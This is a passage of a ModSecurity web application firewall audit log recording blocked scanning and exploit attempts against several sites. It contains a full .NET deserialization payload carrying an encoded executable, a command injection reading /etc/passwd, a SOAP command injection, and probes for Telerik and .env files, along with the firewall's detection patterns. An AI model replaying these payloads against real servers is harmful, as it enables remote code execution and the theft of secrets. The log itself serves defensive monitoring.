"/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748931395046058 5065 (- - -) Stopwatch2: 1748931395046058 5065; combined=3665, p1=436, p2=3129, p3=35, p4=34, p5=31, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --70c79062-Z-- --df80b066-A-- [03/Jun/2025:13:16:35 +0700] aD6TQ0SujXvW2xVCZlWUggAAAAw 103.236.140.4 55266 103.236.140.4 8181 --df80b066-B-- POST /CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 8004 User-Agent: Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Safari/120.0 Safari/537.36 Accept: */* Accept-Language: en Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 171908910 --df80b066-C-- stagingTaskData=%3cSOAP-ENV%3aEnvelope%20xmlns%3axsi%3d%22http%3a//www.w3.org/2001/XMLSchema-instance%22%20xmlns%3axsd%3d%22http%3a//www.w3.org/2001/XMLSchema%22%20xmlns%3aSOAP-ENC%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%20xmlns%3aSOAP-ENV%3d%22http%3a//schemas.xmlsoap.org/soap/envelope/%22%20xmlns%3aclr%3d%22http%3a//schemas.microsoft.com/soap/encoding/clr/1.0%22%20SOAP-ENV%3aencodingStyle%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%3e%0a%20%20%3cSOAP-ENV%3aBody%3e%0a%20%20%20%20%3ca1%3aWindowsIdentity%20id%3d%22ref-1%22%20xmlns%3aa1%3d%22http%3a//schemas.microsoft.com/clr/nsassem/System.Security.Principal/mscorlib%2c%20Version%3d4.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3db77a5c561934e089%22%3e%0a%20%20%20%20%20%20%3cSystem.Security.ClaimsIdentity.actor%20id%3d%22ref-2%22%20xmlns%3d%22%22%20xsi%3atype%3d%22xsd%3astring%22%3eAAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADAAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0BAAAAC19jb21wYXJpc29uAyJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAAAAIAAAAGBgAAALoXL2MgZWNobyBUVnFRQUFNQUFBQUVBQUFBLy84QUFMZ0FBQUFBQUFBQVFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQTZBQUFBQTRmdWc0QXRBbk5JYmdCVE0waFZHaHBjeUJ3Y205bmNtRnRJR05oYm01dmRDQmlaU0J5ZFc0Z2FXNGdSRTlUSUcxdlpHVXVEUTBLSkFBQUFBQUFBQUNUT1BEVzExbWVoZGRabm9YWFdaNkZyRVdTaGROWm5vVlVSWkNGM2xtZWhiaEdsSVhjV1o2RnVFYWFoZFJabm9YWFdaK0ZIbG1laFZSUnc0WGZXWjZGZzNxdWhmOVpub1VRWDVpRjFsbWVoVkpwWTJqWFdaNkZBQUFBQUFBQUFBQUFBQUFBQUFBQUFGQkZBQUJNQVFRQU81UnRTZ0FBQUFBQUFBQUE0QUFQQVFzQkJnQUFzQUFBQUtBQUFBQUFBQUNiaFFBQUFCQUFBQURBQUFBQUFFQUFBQkFBQUFBUUFBQUVBQUFBQUFBQUFBUUFBQUFBQUFBQUFHQUJBQUFRQUFBQUFBQUFBZ0FBQUFBQUVBQUFFQUFBQUFBUUFBQVFBQUFBQUFBQUVBQUFBQUFBQUFBQUFBQUFiTWNBQUhnQUFBQUFVQUVBeUFjQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU9EQkFBQWNBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBREFBQURnQVFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBTG5SbGVIUUFBQUJtcVFBQUFCQUFBQUN3QUFBQUVBQUFBQUFBQUFBQUFBQUFBQUFBSUFBQVlDNXlaR0YwWVFBQTVnOEFBQURBQUFBQUVBQUFBTUFBQUFBQUFBQUFBQUFBQUFBQUFFQUFBRUF1WkdGMFlRQUFBRnh3QUFBQTBBQUFBRUFBQUFEUUFBQUFBQUFBQUFBQUFBQUFBQUJBQUFEQUxuSnpjbU1BQUFESUJ3QUFBRkFCQUFBUUFBQUFFQUVBQUFBQUFBQUFBQUFBQUFBQVFBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUE%2bPiVURU1QJVxock9YVy5iNjQGBwAAAANjbWQEBQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQdtZXRob2QwB21ldGhvZDEDAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCQgAAAAJCQAAAAkKAAAABAgAAAAwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BwAAAAR0eXBlCGFzc2VtYmx5BnRhcmdldBJ0YXJnZXRUeXBlQXNzZW1ibHkOdGFyZ2V0VHlwZU5hbWUKbWV0aG9kTmFtZQ1kZWxlZ2F0ZUVudHJ5AQECAQEBAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkGCwAAALACU3lzdGVtLkZ1bmNgM1tbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MsIFN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQYMAAAAS21zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQoGDQAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5Bg4AAAAaU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MGDwAAAAVTdGFydAkQAAAABAkAAAAvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIHAAAABE5hbWUMQXNzZW1ibHlOYW1lCUNsYXNzTmFtZQlTaWduYXR1cmUKU2lnbmF0dXJlMgpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAQADCA1TeXN0ZW0uVHlwZVtdCQ8AAAAJDQAAAAkOAAAABhQAAAA%2bU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGFQAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKAQoAAAAJAAAABhYAAAAHQ29tcGFyZQkMAAAABhgAAAANU3lzdGVtLlN0cmluZwYZAAAAK0ludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGGgAAADJTeXN0ZW0uSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKARAAAAAIAAAABhsAAABxU3lzdGVtLkNvbXBhcmlzb25gMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JDAAAAAoJDAAAAAkYAAAACRYAAAAKCw%3d%3d%3c/System.Security.ClaimsIdentity.actor%3e%0a%20%20%20%20%3c/a1%3aWindowsIdentity%3e%0a%20%20%3c/SOAP-ENV%3aBody%3e%0a%3c/SOAP-ENV%3aEnvelope%3e --df80b066-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --df80b066-E-- --df80b066-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)((?:\\bx(?:link:href|html|mlns)|!ENTITY\\b.{0,399}?\\b(?:SYSTEM|PUBLIC)|\\bdata:text\\/html))" at ARGS:stagingTaskData. [file "/usr/local/apache/modsecurity-cwaf/rules/07_XSS_XSS.conf"] [line "170"] [id "213060"] [rev "7"] [msg "COMODO WAF: XSS Filter - Category 3: Attribute Vector||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748931395065071 14784 (- - -) Stopwatch2: 1748931395065071 14784; combined=13539, p1=386, p2=13126, p3=0, p4=0, p5=27, sr=68, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --df80b066-Z-- --6fd7a762-A-- [03/Jun/2025:13:16:35 +0700] aD6TQ5AN5Lj366RdGMyYDgAAAM0 103.236.140.4 55274 103.236.140.4 8181 --6fd7a762-B-- POST /soap.cgi?service=whatever-control;curl HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 16 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.5 Safari/605.1.15 Content-Type: text/xml SOAPAction: "whatever-serviceType#whatever-action" X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 171908913 --6fd7a762-C-- whatever-content --6fd7a762-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --6fd7a762-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748931395082386 5557 (- - -) Stopwatch2: 1748931395082386 5557; combined=4065, p1=365, p2=3622, p3=21, p4=24, p5=33, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6fd7a762-Z-- --809f4346-A-- [03/Jun/2025:13:16:36 +0700] aD6TRESujXvW2xVCZlWUhQAAABY 103.236.140.4 55298 103.236.140.4 8181 --809f4346-B-- POST /password_change.cgi HTTP/1.0 Referer: https://perpustakaan.smkn22jakarta.sch.id Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 73 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 171908922 --809f4346-C-- user=rootxx&pam=&old=test|cat /etc/passwd&new1=test2&new2=test2&expired=2 --809f4346-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --809f4346-E-- --809f4346-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /password_change.cgi"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748931396061900 1892 (- - -) Stopwatch2: 1748931396061900 1892; combined=594, p1=390, p2=175, p3=0, p4=0, p5=29, sr=69, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --809f4346-Z-- --06ea6d32-A-- [03/Jun/2025:13:16:40 +0700] aD6TSESujXvW2xVCZlWUkQAAABA 103.236.140.4 55366 103.236.140.4 8181 --06ea6d32-B-- GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 171908948 --06ea6d32-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --06ea6d32-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".web.ui.webresource.axd"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748931400064851 3065 (- - -) Stopwatch2: 1748931400064851 3065; combined=1345, p1=577, p2=740, p3=0, p4=0, p5=28, sr=171, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --06ea6d32-Z-- --facef360-A-- [03/Jun/2025:13:16:42 +0700] aD6TSkSujXvW2xVCZlWUlQAAAAE 103.236.140.4 55400 103.236.140.4 8181 --facef360-B-- GET /Telerik.Web.UI.WebResource.axd?_TSM_CombinedScripts_=;;System.Web.Extensions,%20Version=4.0.0.0,%20Culture=neutral,%20PublicKeyToken=31bf3856ad364e35:de-DE:db3d9eb3-6d72-4959-b303-32b61119a4a8:ea597d4b:b25378d2 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 171420160 --facef360-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --facef360-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".web.ui.webresource.axd"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748931402087899 3303 (- - -) Stopwatch2: 1748931402087899 3303; combined=1675, p1=452, p2=1194, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --facef360-Z-- --4ac55b22-A-- [03/Jun/2025:13:18:56 +0700] aD6T0I0G58RZMmoh8H3vlgAAAIA 103.236.140.4 57116 103.236.140.4 8181 --4ac55b22-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 167.172.232.142 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 167.172.232.142 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --4ac55b22-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4ac55b22-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748931536319160 826 (- - -) Stopwatch2: 1748931536319160 826; combined=317, p1=279, p2=0, p3=0, p4=0, p5=38, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4ac55b22-Z-- --dd8e4115-A-- [03/Jun/2025:13:30:35 +0700] aD6WiwhM7ynDNybXsoN_kgAAAEQ 103.236.140.4 37674 103.236.140.4 8181 --dd8e4115-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 157.245.105.107 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 157.245.105.107 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --dd8e4115-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dd8e4115-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748932235234435 750 (- - -) Stopwatch2: 1748932235234435 750; combined=298, p1=261, p2=0, p3=0, p4=0, p5=36, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dd8e4115-Z-- --02c2614f-A-- [03/Jun/2025:13:45:18 +0700] aD6Z_pAN5Lj366RdGMyeFAAAAMg 103.236.140.4 48790 103.236.140.4 8181 --02c2614f-B-- GET /vendor/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.28 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.28 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.87 Safari/537.36 Accept-Charset: utf-8 --02c2614f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --02c2614f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file 